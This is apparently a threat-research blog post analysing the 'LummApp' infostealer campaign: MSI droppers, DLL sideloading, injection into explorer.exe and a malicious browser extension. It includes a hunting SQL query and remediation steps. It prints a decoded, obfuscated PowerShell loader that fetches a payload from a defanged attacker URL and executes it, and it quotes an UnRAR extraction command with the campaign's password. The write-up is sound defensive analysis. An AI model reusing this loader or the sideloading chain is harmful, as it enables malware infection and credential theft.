In October 2024, Team Axon researchers uncovered a notable large-scale threat campaign, dubbed "LummApp," targeting users and organizations through a combination of advanced adware and infostealing techniques. Disguised as a benign application, LummApp deploys malicious browser extensions capable of exfiltrating data, capturing screen activity, manipulating clipboard contents, and tracking user browsing behavior.
The campaign was first identified during an investigation into a network incident at a European company, exposing LummApp’s global reach and unique attack methods. Likely active since early October 2024, LummApp is distributed via ZIP files containing MSI installers that deploy the malicious extensions on compromised devices. It employs advanced evasion techniques, including DLL SideLoading and heavily obfuscated PowerShell scripts. By exploiting legitimate DLLs associated with trusted OBS-signed files, the malware bypasses traditional security measures, enabling persistent and undetected execution.
LummApp also leverages components of the Lumma Info Stealer, a SaaS (Software as a Service) malware framework designed to extract sensitive information from infected systems. It belongs to the broader category of info-stealing malware, primarily targeting user credentials, financial data, and other sensitive information. Lumma remains a significant threat to individuals and organizations alike.
The attack begins on websites hosting cracked software and torrents, such as MediaFire. When a user attempts to install software from these sites, a new pop-up window appears, displaying a visual message stating “Installation in progress.” Meanwhile, the actual software installation occurs in a separate browser tab.
Simultaneously, the user is redirected to a Mega.nz link, which provides a ZIP file for download. Inside this ZIP file is an .MSI file—the malicious payload. This file initiates the infection process when executed, leveraging user trust and disguising the malware as a legitimate installer.
MSI Execution
The Microsoft Software Installer (MSI) initiates the attack by creating a directory within %appdata%/Roaming with a name pattern resembling /XXX XXX XX/XXXXApp/. This directory is populated with all necessary files for the following stages of the attack, including DLLs, executables, and configuration files.
The attacker utilizes UnRAR.exe to unpack a malicious DLL required for the next phase, which involves a DLL sideloading technique.
In various versions of this campaign, the UnRAR.exe command consistently appears with similar parameters, often using the same password to unpack files. The command is structured as follows: "UnRAR.exe" x -p2161183588a "<path_to_directory>/RoxiApp/kafkjo.rar" "<path_to_directory>/RoxiApp/"
During installation, the MSI file runs a signed executable from a trusted, well-known company. However, this executable is vulnerable to a DLL sideloading exploit, which the attacker uses to load a malicious DLL from a newly created directory. By exploiting this weakness, the malware bypasses security controls and executes further malicious actions on the system.
Notable executables observed in this campaign include:
DLL Sideloading
Once executed, the legitimate executable searches for a DLL with a specific name in its current directory. When placed in an attacker-controlled directory within AppData, it discovers and loads the malicious DLL planted there. This DLL, previously unpacked and containing obfuscated code, evades detection mechanisms.
After being loaded, the malicious DLL injects a Lummac2 executable into explorer.exe, allowing the attacker to execute additional payloads and actions under the guise of a trusted system process.
Our analysis reveals the following activities performed by the injected explorer.exe process:
This activity highlights the threat’s focus on sensitive data, including financial and personal information, using multiple techniques to avoid detection and persist within the environment.
Encoded PowerShell command
Stage 1
An encoded PowerShell command was executed by the injected Explorer.exe. Here is an example of the decoded command.
$VEkiM = ("Qh0+CQMxQjk/Mx1AOBRERio7BxZAKAcfHwg4Fj80JAckRDlFKjw+ORgXTU0=")
$cehG9 = $VEkiM.Replace("@", "a")
$E7Bu1 = [Convert]::FromBase64String($cehG9) | ForEach-Object { $_ -bxor 112}
$rRtwl = [System.Text.Encoding]::ASCII.GetString($E7Bu1).Replace("@", "a")
$uk89P = [Convert]::FromBase64String($rRtwl)
$a43xC = [byte[]](178, 23, 6, 192, 126);
$qefST = 0;
$xlnIE = $uk89P | ForEach-Object {
$_ -bxor $a43xC[$qefST++];
if ($qefST -ge $a43xC.Length) {
$qefST = 0
}
}
$cd4to=new-object System.Net.Webclient;
$ODs6C = [System.Text.Encoding]::ASCII.GetString($xlnIE);
$Rl13o=$cd4to.DownloadString($ODs6C);
$rGlTq = $Rl13o.Replace("!", "l").Replace("*", "d").Replace("`"", "T").Replace("'", "H").Replace(";", "F")
$hluEJ = [Convert]::FromBase64String($rGlTq)
[System.Text.Encoding]::ASCII.GetString($hluEJ) | iex
The script defines a base64-encoded string $VEkiM, decodes it, and applies an XOR operation (value 112). After further decoding using a byte array $a43xC, it retrieves a URL, hXXps://tcl-black[.]com/2010[].]bs64, using System.Net.WebClient.
The downloaded content undergoes character replacement and Base64 decoding to yield a second encoded command, which is then executed with IEX (Invoke-Expression). The URL returns a large obfuscated command, marking the next stage of the attack.
Stage 2
The decoded command initiates several obfuscation-heavy support functions and processes a large, comma-separated base64 string spanning over 3,400 lines.
Here's a summary of the command's actions:
The resulting files form a browser extension, primed for the campaign’s next stage. This extension is designed to conduct further actions within the target environment.
Browser Extension
Based on our research, the end goal of the malware is to deploy a browser extension, which is composed of heavily obfuscated JavaScript functions.
The browser extension directory structure is split between 2 main libraries:
Domains:
URLs:
Hashes:
SELECT *
FROM INVESTIGATION.EDR_PROCESS_CREATION_EVENTS
WHERE EVENT_TIME > current_timestamp - interval '30d'
AND (
INITIATING_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
OR TARGET_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
OR PARENT_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
OR INITIATING_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
OR TARGET_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
OR PARENT_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
OR TARGET_PROCESS_COMMANDLINE ILIKE '%explorer.exe explorer.exe'
);
Uninstall Suspicious Applications
Check Browser Extensions
Check for Persistence mechanisms:
In the samples analyzed by Hunters, no persistence mechanisms were identified. However, we recommend checking for potential persistence mechanisms that may have been created by this campaign, such as entries in Task Scheduler, Startup programs, or Registry Run keys.
To stay updated on threat-hunting research, activities, and queries, follow Team Axon’s X/Twitter account (@team__axon).